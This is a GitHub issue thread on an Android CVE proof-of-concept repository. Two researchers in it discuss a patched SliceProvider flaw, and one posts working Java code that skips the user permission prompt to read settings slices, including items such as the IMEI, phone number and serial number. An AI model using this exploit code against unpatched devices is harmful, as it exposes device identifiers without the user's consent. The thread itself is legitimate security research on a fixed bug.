search

michalbednarski / ReparcelBug

CVE-2017-0806 PoC (Android GateKeeperResponse writeToParcel/createFromParcel mismatch)
22 stars 12 forks source link

Regarding SliceProvider bug #1

Open heeeeen opened 4 years ago

heeeeen commented 4 years ago

Hi, michal

Just see you got credited for another interesting bug about SlicePovider(https://android.googlesource.com/platform/frameworks/base/+/ce472cd14f7262a0f5b3ffe656af05ed673c8e08). I tried some research but got no result. It seems as if the attack could target some system slice provider like in Settings to get sensitive information? Could you give me some hint?

Thanks, heeeeen

michalbednarski commented 4 years ago

In original PoC provided to Google I've used content://android.settings.slices/action/battery_saver, but in general bug could be used against any SliceProvider that doesn't care about what is uri authority (android.settings.slices in above example) was requested.

List of slices from system settings that can be accessed with this bug can be dumped from rooted device once system setting slices are indexed (that is, any of them is accessed), you can use official SliceViewer to view slices.

Normally, Slices can be accessed by home screen, assistant (application selected to handle home key long press) and when other application tries to access Slice it will receive Slice with Intent that can be used to request permission from user. With this bug that permission prompt can be skipped and some of Slices can be accessed (for example those from list below (replace battery_saver in uri specified above with value from key to get their uri), there's few other system settings Slices that are hardcoded in SettingsSliceProvider, but they are unaffected by this bug because they rely on uri authority matching)

$ adb shell "sqlite3 -line /data/user_de/0/com.android.settings/databases/slices_index.db 'SELECT * FROM slices_index;'"
                       key = phone_number
                     title = Phone number
                   summary =  
               screentitle = About emulated device
                  keywords = 
                      icon = 0
                  fragment = com.android.settings.deviceinfo.aboutphone.MyDeviceInfoFragment
                controller = com.android.settings.deviceinfo.PhoneNumberPreferenceController
            platform_slice = 0
                slice_type = 0
unavailable_slice_subtitle = 

                       key = imei_info
                     title = IMEI
                   summary =  
               screentitle = About emulated device
                  keywords = 
                      icon = 0
                  fragment = com.android.settings.deviceinfo.aboutphone.MyDeviceInfoFragment
                controller = com.android.settings.deviceinfo.imei.ImeiInfoPreferenceController
            platform_slice = 0
                slice_type = 0
unavailable_slice_subtitle = 

                       key = build_number
                     title = Build number
                   summary =  
               screentitle = About emulated device
                  keywords = 
                      icon = 0
                  fragment = com.android.settings.deviceinfo.aboutphone.MyDeviceInfoFragment
                controller = com.android.settings.deviceinfo.BuildNumberPreferenceController
            platform_slice = 0
                slice_type = 0
unavailable_slice_subtitle = 

                       key = os_firmware_version
                     title = Android version
                   summary =  
               screentitle = Android version
                  keywords = 
                      icon = 0
                  fragment = com.android.settings.deviceinfo.firmwareversion.FirmwareVersionSettings
                controller = com.android.settings.deviceinfo.firmwareversion.FirmwareVersionDetailPreferenceController
            platform_slice = 0
                slice_type = 0
unavailable_slice_subtitle = 

                       key = screen_magnification_gestures_preference_screen
                     title = Magnify with triple-tap
                   summary = 
               screentitle = Magnification
                  keywords = 
                      icon = 0
                  fragment = com.android.settings.accessibility.MagnificationPreferenceFragment
                controller = com.android.settings.accessibility.MagnificationGesturesPreferenceController
            platform_slice = 0
                slice_type = 1
unavailable_slice_subtitle = 

                       key = battery_saver
                     title = Battery Saver
                   summary = Extend battery life
               screentitle = Battery Saver
                  keywords = 
                      icon = 0
                  fragment = com.android.settings.fuelgauge.batterysaver.BatterySaverSettings
                controller = com.android.settings.fuelgauge.batterysaver.BatterySaverButtonPreferenceController
            platform_slice = 1
                slice_type = 1
unavailable_slice_subtitle = 

                       key = remote_volume
                     title = Cast volume
                   summary = 
               screentitle = Sound
                  keywords = 
                      icon = 2131231348
                  fragment = com.android.settings.notification.SoundSettings
                controller = com.android.settings.notification.RemoteVolumePreferenceController
            platform_slice = 0
                slice_type = 2
unavailable_slice_subtitle = 

                       key = media_volume
                     title = Media volume
                   summary = 
               screentitle = Sound
                  keywords = 
                      icon = 2131231069
                  fragment = com.android.settings.notification.SoundSettings
                controller = com.android.settings.notification.MediaVolumePreferenceController
            platform_slice = 0
                slice_type = 2
unavailable_slice_subtitle = 

                       key = call_volume
                     title = Call volume
                   summary = 
               screentitle = Sound
                  keywords = 
                      icon = 2131231059
                  fragment = com.android.settings.notification.SoundSettings
                controller = com.android.settings.notification.CallVolumePreferenceController
            platform_slice = 0
                slice_type = 2
unavailable_slice_subtitle = 

                       key = ring_volume
                     title = Ring volume
                   summary = 
               screentitle = Sound
                  keywords = 
                      icon = 2131231216
                  fragment = com.android.settings.notification.SoundSettings
                controller = com.android.settings.notification.RingVolumePreferenceController
            platform_slice = 0
                slice_type = 2
unavailable_slice_subtitle = 

                       key = alarm_volume
                     title = Alarm volume
                   summary = 
               screentitle = Sound
                  keywords = 
                      icon = 17302288
                  fragment = com.android.settings.notification.SoundSettings
                controller = com.android.settings.notification.AlarmVolumePreferenceController
            platform_slice = 0
                slice_type = 2
unavailable_slice_subtitle = 

                       key = vibrate_when_ringing
                     title = Vibrate for calls
                   summary = 
               screentitle = Sound
                  keywords = 
                      icon = 0
                  fragment = com.android.settings.notification.SoundSettings
                controller = com.android.settings.notification.VibrateWhenRingPreferenceController
            platform_slice = 0
                slice_type = 1
unavailable_slice_subtitle = 

                       key = airplane_mode
                     title = Airplane mode
                   summary = 
               screentitle = Network & internet
                  keywords = 
                      icon = 2131230932
                  fragment = com.android.settings.network.NetworkDashboardFragment
                controller = com.android.settings.network.AirplaneModePreferenceController
            platform_slice = 1
                slice_type = 1
unavailable_slice_subtitle = 

                       key = auto_rotate
                     title = Auto-rotate screen
                   summary = 
               screentitle = Display
                  keywords = 
                      icon = 0
                  fragment = com.android.settings.DisplaySettings
                controller = com.android.settings.display.AutoRotatePreferenceController
            platform_slice = 0
                slice_type = 1
unavailable_slice_subtitle = 

                       key = gesture_double_tap_power
                     title = Jump to camera
                   summary = To quickly open camera, press the power button twice. Works from any screen.
               screentitle = Jump to camera
                  keywords = 
                      icon = 0
                  fragment = com.android.settings.gestures.DoubleTapPowerSettings
                controller = com.android.settings.gestures.DoubleTapPowerPreferenceController
            platform_slice = 0
                slice_type = 1
unavailable_slice_subtitle = 

                       key = notification_badging
                     title = Allow notification dots
                   summary = 
               screentitle = Notifications
                  keywords = 
                      icon = 0
                  fragment = com.android.settings.notification.ConfigureNotificationSettings
                controller = com.android.settings.notification.BadgingNotificationPreferenceController
            platform_slice = 0
                slice_type = 1
unavailable_slice_subtitle = 

                       key = hardware_info_device_model
                     title = Model
                   summary =  
               screentitle = Model & hardware
                  keywords = 
                      icon = 0
                  fragment = com.android.settings.deviceinfo.hardwareinfo.HardwareInfoFragment
                controller = com.android.settings.deviceinfo.hardwareinfo.DeviceModelPreferenceController
            platform_slice = 0
                slice_type = 0
unavailable_slice_subtitle = 

                       key = hardware_info_device_serial
                     title = Serial number
                   summary =  
               screentitle = Model & hardware
                  keywords = 
                      icon = 0
                  fragment = com.android.settings.deviceinfo.hardwareinfo.HardwareInfoFragment
                controller = com.android.settings.deviceinfo.hardwareinfo.SerialNumberPreferenceController
            platform_slice = 0
                slice_type = 0
unavailable_slice_subtitle = 

                       key = hardware_info_device_revision
                     title = Hardware version
                   summary =  
               screentitle = Model & hardware
                  keywords = 
                      icon = 0
                  fragment = com.android.settings.deviceinfo.hardwareinfo.HardwareInfoFragment
                controller = com.android.settings.deviceinfo.hardwareinfo.HardwareRevisionPreferenceController
            platform_slice = 0
                slice_type = 0
unavailable_slice_subtitle =
heeeeen commented 4 years ago

Hi, Michal, Thank you so much for your detailed analysis!

heeeeen commented 4 years ago

Hi, Michal

Could you show me POC? I used the following code to call the SliceProvider directly

Bundle b = new Bundle();
                //b.putParcelable("slice_uri", ub.build());
                Uri uriCall = Uri.parse("content://android.settings.slices");
                Uri uri = Uri.parse("content://android.settings.slices/action/toggle_nfc");
                b.putParcelable("slice_uri", uri);

                ArrayList<SliceSpec> supportedSpecs = new ArrayList<SliceSpec>();
                supportedSpecs.add(new SliceSpec("androidx.app.slice.LIST", 1));
                supportedSpecs.add(new SliceSpec("androidx.slice.LIST", 1));
                supportedSpecs.add(new SliceSpec("androidx.app.slice.BASIC", 1));
                supportedSpecs.add(new SliceSpec("androidx.slice.BASIC", 1));

                b.putParcelableArrayList("supported_specs", supportedSpecs);

               //getContentResolver().call(ub.build(), "bind_slice", null, b);
                Bundle reponseBundle = getContentResolver().call(uriCall, "bind_slice", null, b);
                Log.d("heen", reponseBundle.getParcelable("slice").toString());

But get 

12-25 19:44:13.658 25797 25797 D heen    : slice:
12-25 19:44:13.658 25797 25797 D heen    :    image
12-25 19:44:13.658 25797 25797 D heen    :    text: Your Device wants to show Settings slices
12-25 19:44:13.658 25797 25797 D heen    :    int
12-25 19:44:13.658 25797 25797 D heen    :    slice:
12-25 19:44:13.658 25797 25797 D heen    :       image
12-25 19:44:13.658 25797 25797 D heen    :       action

seem it still needs user to grant the permission. Also, I found the fix to check the content provider authority. But how you not specify android.settings.slices authority to call the uri content://android.settings.slices/action/battery_saver .

Merry Christmas! Regards, En He

michalbednarski commented 4 years ago

You'll need to replace Uri authority (in uri in your code) to point your own provider as well as use sliceManager.grantSlicePermission to grant access to that Uri

My code for that was:

    static final Uri TARGET_URI =
            Uri.parse("content://com.example.sliceuri.myprovider/action/battery_saver");
    static final Uri PROVIDER_URI =
            Uri.parse("content://android.settings.slices");

    private Slice doQuery() {
        SliceManager sliceManager = getSystemService(SliceManager.class);
        sliceManager.grantSlicePermission(getPackageName(), TARGET_URI);

        Bundle extras = new Bundle();
        extras.putParcelable("slice_uri", TARGET_URI);
        extras.putParcelableArrayList("supported_specs", new ArrayList<Parcelable>(Arrays.asList(
                new SliceSpec("androidx.slice.LIST", 1),
                new SliceSpec("androidx.app.slice.BASIC", 1),
                new SliceSpec("androidx.slice.BASIC", 1),
                new SliceSpec("androidx.app.slice.LIST", 1)
        )));
        Bundle result = getContentResolver().call(
                PROVIDER_URI,
                "bind_slice",
                null,
                extras
        );
        return result.getParcelable("slice");
    }

You'll also need to declare provider with authority com.example.sliceuri.myprovider in AndroidManifest.xml. This provider doesn't need to actually do anything, just returning true from onCreate is sufficient implementation.

heeeeen commented 4 years ago

michal, Thanks for your help and happy new year! I reproduced successfully.

heeeeen commented 4 years ago

Hi, michal, Thank you again!

I found another bug when researching your bug. :) I was wondering if I could have other ways to reach to you to talk about interesting Android bugs.

michalbednarski commented 4 years ago

Send me an email, you can find my address in git log of this repository (looks like GitHub doesn't show those in web interface and apparently spam bots rarely index those)